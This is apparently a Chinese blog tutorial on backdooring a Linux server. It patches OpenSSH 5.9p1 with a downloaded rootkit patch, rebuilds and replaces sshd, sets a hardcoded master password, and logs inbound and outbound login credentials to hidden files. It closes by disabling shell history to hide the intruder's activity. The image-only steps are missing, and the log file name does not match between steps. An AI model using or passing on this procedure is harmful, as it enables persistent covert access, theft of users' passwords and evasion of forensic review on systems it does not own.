Linux操作系统的密码较难破解(除非管理员把密码写入Readme文件中)此文利用最原始openssh服务来获取root密码(老内容,算是记录下)

该后门是通过补丁的方式修改openssh,并且重新编译替换了sshd

安装依赖包

yum -y install openssl openssl-devel pam-devel zlib zlib-devel

下载软件包

#软件包

wget http://ftp.lfs-matrix.net/pub/blfs/conglomeration/openssh/openssh-5.9p1.tar.gz

#补丁包

wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

解压:

《ssh后门利用劫持root密码》

打补丁:

《ssh后门利用劫持root密码》

添加后门:

vim include.sh

《ssh后门利用劫持root密码》

define ILOG "/usr/share/.ilog"    # 记录远程登录本机的用户和密码
define OLOG "/usr/share/.olog"    # 记录本机远程登录到其他主机的用户和密码
define SECRETPW "hello123"    # 后门密码

编译安装:

./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5 && make && make install

重启服务:

systemctl restart sshd.service

验证结果:

strings /usr/sbin/sshd

《ssh后门利用劫持root密码》

xshell 使用后门密码 hello123 连接验证

《ssh后门利用劫持root密码》

使用账号密码登录之查看/usr/share/.ifile文件

《ssh后门利用劫持root密码》

后续操作:

export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

 

注:高版本的openssh要进行对/etc/ssh/ssh_host_*.key文件进行删除(移动),解决/etc/ssh/ssh_host_ed25519_key文件用命令ssh-keygen -t dsa -f /etc/ssh/ssh_host_ed25519_key